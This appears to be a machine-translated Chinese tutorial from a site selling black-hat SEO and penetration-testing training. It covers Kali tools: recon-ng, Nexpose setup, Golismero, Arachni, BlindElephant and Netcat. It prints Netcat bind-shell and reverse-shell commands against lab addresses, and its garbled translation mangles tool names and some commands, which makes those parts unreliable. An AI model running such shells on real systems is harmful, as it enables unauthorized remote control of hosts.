黑帽seo培训_渗透安全培训_若钒安全网

若钒渗透技术及黑帽SEO培训,
一对一教学国内外白帽黑帽seo技术!微信:tllieshou520

渗透测试之辅助工具

声明:若钒SEO博客不承接任何黑色(灰色)产业及业务,本网站所有只提供参考与学习,请遵守国家法律法规。运行上述指令后,将进入recon-ng框架的提示(见图1)..

一般来说,它的提示信息非常类似于Metasploit接口。

图1显示recon-ng支持的各种指令,您可以在其提示符状态下使用帮助指令。

该指令的结果如图2所示。

图2在这些指令中,最常用的几条指令如下所示。

使用或加载:加载指定的模块。

重新加载:重新加载所有模块。

INFO:显示指定模块的特定信息。

Run:运行指定的模块。

显示:显示侦察框架的各种数据对象。

后退:退出当前提示符的级别。

显示模块指令列出了所有可用模块。

该指令的结果如图3所示。

图3下面的说明可以被Bing的搜索引擎用来收集指定域名的主机信息..

图4 II.默认情况下安装漏洞扫描OpenVAS的过程。

虽然它是一个漏洞扫描仪,渗透测试人员不能仅仅依靠一个工具来确定安全现象。

我们应该使用一些工具来获取更全面、更详细的信息,并充分了解被测信息系统的安全状况。

Rapid 7生产的NeXist漏洞扫描器如下所述。

Rapid 7的NeXist漏洞扫描社区版(NEXPoeCE)是一个免费的bug扫描程序。

它可以与Metasploit开发框架集成。

NeXpose共享版具有以下特点:能够扫描多达32个IP;●漏洞数据库可以定期升级;●风险评估的优先级可以明确;●可以提供指导意见以提高安全性;●与Metasploit集成;●通过网站提供共享版本的支持;●易于部署;●可作为免费的主要安全解决方案。

商业版的NeXpose程序有更多的功能..

例如,它不限制IP扫描的数量,允许分布式扫描,更灵活的扫描报告,Web和数据库应用程序扫描,并具有专门的技术支持服务。

NeXist由两部分组成。

共享版本的程序只有一个引擎,即本地引擎..

NeXitesSecurityConsole:安全控制台负责与扫描引擎交互,以启动扫描任务并接收扫描结果。

控制台还配备了一个可配置的Web接口来操作扫描引擎。

在初步了解了NeXist共享版本之后,我们接下来将安装该程序。

主要结果如下:(1)在KaliLinux中安装NeXpose以安装NeXpose共享版本的具体步骤如下。

1)在网站上下载安装程序。

您首先需要使用工作电子邮件注册。

然后,将NeXITES CE许可证密钥和下载指南发送到注册的电子邮件地址。

2)根据电子邮件中的信息,下载NeXpose共享版本的安装程序。

此示例下载64位Linux-NeXposeSetup-Linux64.bin的安装程序。

3)打开终端程序,进入下载文件所在目录。

然后使用以下说明启动NeXpose安装程序。

在#上显示NeXpose的安装界面..器/NeXpose Setup-Linux64.bin屏幕,如图5所示..

图5)根据屏幕上的提示,安装过程是逐步完成的。

配置过程中请妥善保管用户名和用户名设置..

如果您忘记了用户名或,请重新安装NeXpose程序。

(2)在启动NeXist安装之后,您可以输入程序所在的目录来启动NeXist程序。

默认的安装目录是/opt/Rapid 7/n曝露。

相应地,您应该输入程序使用以下指令启动脚本的目录。

然后用下面的脚本启动NeXpose。

#/nsc.sh因为在启动过程中需要初始化漏洞信息数据库,程序的启动过程可能需要几分钟。

程序启动后,您可以通过浏览器登录到NeXist的安全控制台。

如果NeXpose程序安装为守护进程,则在系统启动时自动启动,用户的注销不会终止守护进程。

将其作为守护进程安装的具体步骤如下所示。

输入文件nexposeconsole.rc所在的目录,使用以下说明。

打开此文件并确定NXP_ROOT变量已设置为NeXpose的安装目录。

将该文件复制到/etc/init.d目录,并重命名它。

此示例通过以下指令重命名它。

#cp[installation_directory]/nsc/nexpose console.rc/etc/init.d/nexpose4)使用以下说明设置启动脚本的文件权限。

#chmodx/etc/init.d/n泄密5),让守护进程从系统开始。

#UPDATE-rc.d默认6)您可以使用以下说明控制NeXist守护进程的启动、终止和重新启动。

#/etc/init.d/nexport(3)要登录到NeXist共享控制台的Web接口,请执行以下步骤。

如果没有意外错误,您将看到程序的登录界面。

当您次打开此页面时,浏览器将提示不可信连接信息。

您需要验证证书,并将此站点和证书设置为永久异常规则。

在此之后,您将再也看不到此警告消息。

2)在次访问控制台期间,将首先设置控制台。

它从Rapid 7服务器下载更新安装包。

更新程序的过程需要很长时间。

3)当程序完成初始化设置时,可以使用安装过程中设置的用户名和登录名。

如图6所示,在输入用户名后单击Logon按钮。

图6)控制台将提示您提供激活信息。

如图7所示,在窗口的文本框中输入产品许可密钥后,单击Activate withkey完成激活..

图7次登录到控制台时,您将看到NeXpos的新闻页面。

此页面详细介绍了安装在NeXist系统上的更新信息和功能改进记录。

如果您可以看到这个页面,那么您的Kali Linux系统已经成功地安装了NeXisteSharedEdition。

带有KaliLinux的Ice wease浏览器可能无法登录到NeXpose的安全控制台。

如果发生这种情况,您将安装Firefox浏览器。

(4)使用NeXPTISTH,使用NeXISTISTH对局域网进行简单扫描。

如图8所示,单击NeXpose的控制面板中的“主页”,然后单击“站点列表中的新静态站点”以扫描站点。

图82)然后根据屏幕上的向导设置站点的配置。

之后,依次从菜单中选择站点配置通用.

然后在此选项卡中设置站点名称、任务重要性和任务描述。

接下来,单击Next按钮在Next选项卡中设置。

在资产选项卡中,指定扫描目标的IP地址。

NeXist的共享版本(CE)可以扫描多达32个IP,这也是目标主机数量的上限。

然后单击Next按钮转到下一个选项卡。

在这种情况下,我们将使用NeXpose扫描正在运行Metasploit2的主机,即扫描192.168.56.102。

图9,4)然后需要在扫描设置中配置它。

在这里,我们选择完全审核的全扫描模板其他设置来接受程序的默认设置。

然后单击Next按钮转到下一个选项卡。

5)设置选项后,单击Save按钮保存配置设置。

此后,刚刚保存的扫描任务将出现在程序的站点列表中。

单击扫描图标手动启动扫描任务。

6)任务启动后,界面将显示开始新扫描窗口。

验证信息的正确性后,单击Start Now按钮运行扫描任务。

7)如图10所示,当NeXist完成扫描任务时,它的控制台将显示扫描结果。

图10 8)图11是程序目标主机的漏洞报告。

图11 9)要查看详细的审计报告,请单击顶层菜单上的Reports并运行ReportGenerator(报表生成工具)。

该任务的审计报告如图12所示。

图12简要介绍了该程序的共享版本。

3.Web应用程序测试工具1 Golismero Golismero是一个由Python语言编写的开源Web应用程序测试框架。

戈利斯梅罗的主要特征如下所示。

它可以收集和整理一些著名的测试程序,如sqlmap、Xsser、openvas、dnsrecon和收割机的扫描结果。

它集成了CWE、CVE和OWASP的数据库。

Kali Linux安装的Golismero版本太老了,无法对Web应用程序进行测试。

接下来,您可以通过以下说明查看Golismero的帮助信息。

pythongolismero.py-h程序显示的帮助信息如图13所示..

图13扫描网站的说明如下。

pythongolismero.py192.168.1.138-o192.168-1138.html扫描结果如图14所示。

图14它生成的扫描报告如图15所示。

图152,Arachni Arachni是一个用来扫描用Ruby语言编写的Web应用程序的工具。

采用模块化设计,性能优良。

Arachni的功能足够强大:支持SSL;在审计过程中检测登录状态和重新登录;高速处理HTTP请求;执行并发扫描;充分利用带宽有限的软件平台来准确识别正在测试的目标;解决漏洞、CSRF、代码注入、LDAP注入、路径遍历、文件包含和XSS问题。

缺点是Arachni也有许多限制:它不支持DOM、Java、Ajax和HTML 5;其报告可能存在假阳性错误。

默认情况下,Kali Linux会安装Arachni程序的0.4.4版本。

下面的说明显示帮助信息,并列出Arachni支持的各种指令。

Arachni-h列举了所有模块的说明如下。

Arachni--上面关于lsmd的说明的结果如图16所示。

为了演示目的,我们使用Arachni扫描一个名为DVWA的Web应用程序,并将扫描报告保存为HTML文件。

如果运行DVWA程序的主机使用的IP是192.168.2.22,那么我们需要使用的指令如下..

使用浏览器打开报表文件,会看到如图17所示的信息..

图17 3.盲象是一个用于Web应用程序的指纹识别程序。

该工具通过在固定位置扫描某些静态文件并将这些文件的哈希值与Web应用程序的每个版本的哈希值进行比较来验证测试Web应用程序的版本信息。

该识别技术识别速度快,带宽消耗低,无危害,通用性高,自动化程度高..

若要显示盲人大象的帮助文件,请使用以下说明。

BlindElephant.py-h上面的说明将在屏幕上显示程序的帮助信息。

要了解BlindElephant支持的Web应用程序,或列出它支持的插件,请使用以下说明。

上述说明的结果如下(见图18)。

图18使用以下说明来标识目标站点使用的WordPress程序的哪个版本。

上述指令的输出来自BlindElephant.py目标word press如下..

根据版本信息,我们可以在相应的版本中发现一个安全漏洞。

4.下面是一个多用途网络工具的介绍..

有人称它为TCP/IP协议的瑞士军刀,名为Netcat。

Netcat是一种用连接或UDP协议读写数据的工具。

默认情况下,它使用协议传递数据。

无论是手动输入指令还是其他程序和脚本,这个工具都可以用来传输数据。

ncat程序是netcat的一个改进版本。

您应该注意,Netcat不加密传输的数据。

大多数人都知道Netcat的不同用途。

该工具体积小、可移植、功能强大,可以在要测试的主机上单独运行。

下面是使用Netcat程序满足渗透测试需要的演示。

SSH Web服务器的IP地址为192.168.2.22;客户机的IP地址为192.168.2.23。

(1)打开连接到Netcat的客户端程序可以替换telnet并直接连接到指定IP地址的任何端口。

这是最简单的用法。

例如,您可以使用以下指令连接到192.168.2.22的端口22(SSH服务)。

#nc192.168.2.22远程服务器的应答信息如下所示。

SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1然后,我们使用键组合Ctrl+C关闭连接。

(2)提取服务标题--您可以从前面示例中使用的技术中提取大多数网络服务的服务标题(服务横幅)。

不仅SSH服务有标志性的标题,其他大多数网络服务都有相应的服务标题。

如果端口正在运行HTTP服务,则需要使用HTTP指令提取标题信息。

例如,我们可以使用以下指令提取Web服务软件的版本信息和操作系统信息。

回声-eHEAD/HTTP/1.0nn/NC192.168.2.2280得到服务器响应如下。

HTTP/1.1200OK日期:Tue,2013年10月08日14:09:14GMT服务器:Apache2.2.8(Ubuntu)DAV/2X Powered-BY:PHP/5.2.4-2ubuntu5.10连接:关闭内容-类型:文本/html上述信息表明Web服务的后台程序是Apache,主机的操作系统是Ubuntu5.10。

(3)如果您想使用Netcat程序在端口1234上运行聊天服务器,可以使用以下说明。

在#nc-l-p1234之后,您可以使用telnet、netcat或类似的软件连接到服务器。

telnet 192.168.2.22 1234随后输入的所有字符将显示在服务器端的Netcat程序中。

这实际上建立了一个简单的双向通信连接。

若要关闭连接,请使用组合键CtrlC。

(4)如果要传递名为PASS的文件,可以在接收端运行以下指令。

然后在发送方运行以下指令。

#nc-w3192.168.2.221234 <来自发件人的通行证将文件传递给接收方。>

然后接收器将文件存储为pass.out。

可以使用Netcat在任务中传输文件。

当您利用主机并构建反向时,使用它传递文件。

幸运的是,经过测试的主机安装了一个Netcat程序,传递该文件没有问题。

(5)端口扫描网猫也可以做简单的端口扫描。

此示例将使用Netcat程序扫描被测试主机的tcp 1~1000端口,同时指定程序:显示详细信息(-v),禁止解析DNS名称(-n),不发送任何数据(-z),超时设置为1秒(-w1)。

结合上述要求,我们需要使用的说明如下所示。

虽然Netcat具有端口扫描功能,但建议您将其用于端口扫描。

在这方面,功能毕竟是比较讲究的。

我们也可以使用netcat程序来实现一个可访问的程序。

在这种情况下,指定程序的侦听端口(通过-p选项设置)和(通过-e选项设置)。

如果要在1234端口上打开shell,of/bin/sh可以使用以下指令..

在#nc-e/bin/sh-l-p1234之后,我们使用客户端上的telnet或类似的客户端程序连接到服务器的后门。

Telnet 192.168.2.22 1234在telnet客户端程序提示提供适当信息后,您可以通过此命令在服务器主机上使用任何指令。

例如,我们首先通过id指令获取登录帐户的相关信息,然后我们可以获得以下信息。

如果服务器是带有root权限运行的netcat程序,那么连接到它的客户端用户对服务器主机也具有完全的root权限..

但是它不是真正的终端,也就是说,你不能在上面运行像su这样的指令。

需要注意的是,netcat不做加密连接;另外,只要找到后门的端口,就可以连接到相应的端口,控制服务器主机..

(7)反向shellnetcat的反向工作模式与前面例子的连接模式相反。

在刚才的示例中,我们在服务器上打开了一个端口并将其绑定到它。

反向允许远程主机连接到我们使用的主机。

首先,我们在客户端主机上运行以下指令。

#nc-n-v-l-p 1234然后在服务器端运行以下指令。

#nc-e/bin/sh 192.168.2.23 1234如果客户端主机提示输入以下信息,则连接到反向shell。

从(UN KNOWN)[192.168.22]53529连接到[192.168.23],然后,您可以在客户端主机上向服务器端主机发出任何指令。

例如,您可以在客户端程序中使用以下说明查看远程主机的IP地址。

五、结论本文描述了工作中可能使用的几种工具。

有些软件不包括在内,卡利所包含的软件版本可能不够新。

然而,正如我们所看到的,更新或安装软件的过程并不复杂。

本文介绍了四种软件:信息侦察工具、程序、Web应用工具和网络工具。

介绍的工具是流行的、强大的和高度复杂的程序。

首先简要介绍了这些工具,然后介绍了它们的安装和配置方法,并说明了它们的各种使用方法。微信:tllieshou520 QQ:273439015

若钒黑帽seo,提供最专业的黑帽seo和web渗透技术视频直播 以实战为主。提供最专业正规的黑帽seo培训、渗透测试培训、欢迎咨询!! 微信:tllieshou520 QQ:273439015 云南黑帽子 北京黑帽seo论坛 云南本版黑帽
转载请注明出处:黑帽seo培训_渗透安全培训_若钒安全网 » 渗透测试之辅助工具

若钒黑帽渗透技术-提供最专业的渗透测试培训,黑帽SEO培训,欢迎骚扰!!

若钒黑帽SEO培训 web渗透技术培训
no cache
Processed in 2.425616 Second.